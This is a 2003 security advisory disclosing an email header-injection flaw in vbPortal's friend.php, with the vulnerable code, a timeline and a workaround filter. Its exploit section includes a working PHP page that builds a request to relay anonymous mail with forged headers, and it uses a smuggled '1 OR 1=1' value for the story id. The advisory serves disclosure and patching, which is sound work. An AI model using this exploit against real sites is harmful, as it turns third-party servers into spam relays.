[SCSA-021] Anonymous Mail Forwarding Vulnerabilities in vbPortal

From: Gregory LEBRAS (gregory.lebras_at_security-corporation.com)
Date: 11/22/03

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    Security Corporation Security Advisory [SCSA-021]

    Anonymous Mail Forwarding Vulnerabilities in vbPortal
    ======================================================================

    PROGRAM: vbPortal
    HOMEPAGE: http://www.vbportal.com
    VULNERABLE VERSIONS: 2.0 alpha 8.1 and Prior ?
    RISK: Low
    IMPACT: Allows Unauthorized Users to Send Mail Anonymously
    RELEASE DATE: 2003-11-22

    ======================================================================
    TABLE OF CONTENTS
    ======================================================================

    1..........................................................DESCRIPTION
    2..............................................................DETAILS
    3.............................................................EXPLOITS
    4............................................................SOLUTIONS
    5...........................................................WORKAROUND
    6..................................................DISCLOSURE TIMELINE
    7..............................................................CREDITS
    8...........................................................DISCLAIMER
    9...........................................................REFERENCES
    10............................................................FEEDBACK

    1. DESCRIPTION
    ======================================================================

    "vBPortal is a addon to the already popular message board software
    called vB developed by www.vbulletin.com. vBPortal has came a
    long way, and the new version 3.0 has a lot of great features and
    functions. Intergrating phpnuke's functions and abilities to easily
    add modules and addons has added greater abilities. Simply it adds
    a frontpage, and utilizies vb's abilities and expands on that"

    (direct quote from http://www.vbportal.com)

     
    2. DETAILS
    ======================================================================

    - Anonymous Mail Forwarding :

    A vulnerability has been discovered in the friend.php file that
    allows unauthorized users to send spam (junk mail) anonymously.

    Vulnerable code :

    <?

    [...]
    function SendStory($sid, $yname, $ymail, $fname, $fmail) {
        global $sitename, $nukeurl, $prefix;

        $result2=mysql_query("select title, time, topic from $prefix"._stories."
    where sid=$sid");
        list($title, $time, $topic) = mysql_fetch_row($result2);

        $result3=mysql_query("select topictext from $prefix"._topics." where
    topicid=$topic");
        list($topictext) = mysql_fetch_row($result3);

        $subject = ""._INTERESTING." $sitename";
        $message = ""._HELLO." $fname:\n\n"._YOURFRIEND." $yname
    "._CONSIDERED."\n\n\n$title\n("._FDATE." $time)\n"._FTOPIC."
    $topictext\n\n"._URL.": $nukeurl/article.php?sid=$sid\n\n"._YOUCANREAD."
    $sitename\n$nukeurl";
        mail($fmail, $subject, $message, "From: \"$yname\" <$ymail>\nX-Mailer:
    PHP/" . phpversion());
        $title = urlencode($title);
        $fname = urlencode($fname);
        Header("Location: friend.php?op=StorySent&title=$title&fname=$fname");
    }
    [...]
    function SendSite($yname, $ymail, $fname, $fmail) {
        global $sitename, $slogan, $nukeurl;
        $subject = ""._INTSITE." $sitename";
        $message = ""._HELLO." $fname:\n\n"._YOURFRIEND." $yname "._OURSITE."
    $sitename "._INTSENT."\n\n\n"._FSITENAME." $sitename\n$slogan\n"._FSITEURL."
    $nukeurl\n";
        mail($fmail, $subject, $message, "From: \"$yname\" <$ymail>\nX-Mailer:
    PHP/" . phpversion());
        Header("Location: friend.php?op=SiteSent&fname=$fname");
    }
    [...]
    switch($op) {
        case "SendStory":
        SendStory($sid, $yname, $ymail, $fname, $fmail);
        break;
    [...]
        case "SendSite":
        SendSite($yname, $ymail, $fname, $fmail);
        break;
    [...]

    }
    ?>

    Both functions SendStory () and SendSite () send emails.
    Two variables are (yname and ymail) modifiable in the headers.
    An attacker can so inject what he wants, by using the character
    LF (line feed), %0A in ASCII.

    3. EXPLOITs
    ======================================================================

    - Anonymous Mail Forwarding :

    Here is an example of simple application that changes the mail via
    variables ymail and fname.

    We can here choose the sender, the name of the sender, the addressee,
    the type of the message, the message and add a subject while having
    the choice between both vulnerable functions.

    <?
    if (!isset($Send)){
    ?>

    <form action="<? echo $PHP_SELF; ?>">
    URL : <input type="text" name="url"><br>
    From : <input type="text" name="from"><br>
    Your Name : <input type="text" name="yname"><br>
    To : <input type="text" name="fmail"><br>
    Content Type : <input type="text" name="contenttype" value="text/plain"><br>
    Subject To Add : <input type="text" name="newsubject"><br>
    Op. : <br>
    <input type="radio" checked name="op" value="SendSite">SendSite<br>
    <input type="radio" name="op" value="SendStory">SendStory<br>
    Message : <br><br><textarea name="message" rows="6" cols="50"></textarea>
    <br><br><input type="submit" name="Send" value="Verify">
    </form>

    <?
    }else{

    echo "URL : ".$url."<br>";
    echo "From: ".$from."<br>";
    echo "Your Name: ".$yname."<br>";
    echo "To: ".$fmail."<br>";
    echo "Content Type: ".$contenttype."<br>";
    echo "Added Subject: ".$newsubject."<br>";
    echo "Message : <br><br>".str_replace("\n","<br>",$message);

    if ($op=="SendStory"){ $sid="1%20OR%201=1"; }

    $ymail=$from.">%0A";
    $ymail.="Subject:".$newsubject."%0A";
    $ymail.="Content-Type:multipart/mixed;%20boundary=Anonymous;";
    $ymail.="%0A%0A%0A";
    $fname="%0A--Anonymous%0A";
    $fname.="Content-Type:".$contenttype."%0A%0A";
    $fname.=str_replace("\n","%0A",$message);
    $fname.="%0A%0A%0A";
    $fname.="--Anonymous--";
    $fname.="%0A%0A%0A";

    $url.="/friend.php?sid=".$sid."&op=".$op."&yname=".$yname."&ymail=".$ymail."&fmail=".$fmail."&fname=".$fname;

    echo "<br><br><b><a href=\"$url\">Ok, Mail It</a></b>";
    }
    ?>

    Let us remind that the user chosen in the request of this exploit
    (the first registered) will receive too a copy of the mail,
    because an addressee was already defines.

    Ours will come to add later.

     
    4. SOLUTIONS
    ======================================================================

    You can found a patch at the following link : http://www.phpsecure.info

    Version 3.0b have been fixed

    5. WORKAROUND
    ======================================================================

    For Version 2.0 alpha 8.1 add simply the following line in
    friend.php file just before "switch($op) {" :

    ------SNIP-------

    if (eregi("\n",$yname) OR eregi("\n",$ymail) OR eregi("\r",$yname) OR
    eregi("\r",$ymail)){
      die("Patched");
    }

    ------SNIP-------

    6. DISCLOSURE TIMELINE
    ======================================================================

    12/11/2003 Vulnerability discovered
    12/11/2003 Vendor notified
    12/11/2003 Vendor response
    13/11/2003 Security Corporation clients notified
    13/11/2003 Started e-mail discussions
    21/11/2003 Last e-mail received
    22/11/2003 Public disclosure

    7. CREDITS
    ======================================================================

    frog-m@n <frog-man@security-corporation.com> is credited with this discovery

    8. DISLAIMER
    ======================================================================

    The information within this paper may change without notice. Use of
    this information constitutes acceptance for use in an AS IS condition.
    There are NO warranties with regard to this information. In no event
    shall the author be liable for any damages whatsoever arising out of
    or in connection with the use or spread of this information. Any use
    of this information is at the user's own risk.

    9. REFERENCES
    ======================================================================

    - Original Version:
      http://www.security-corporation.com/advisories-021.html

    - Version Française:
      http://www.security-corporation.com/index.php?id=advisories&a=021-FR

    10. FEEDBACK
    ======================================================================

    Please send suggestions, updates, and comments to:

    Security Corporation
    http://www.security-corporation.com
    advisory@security-corporation.com


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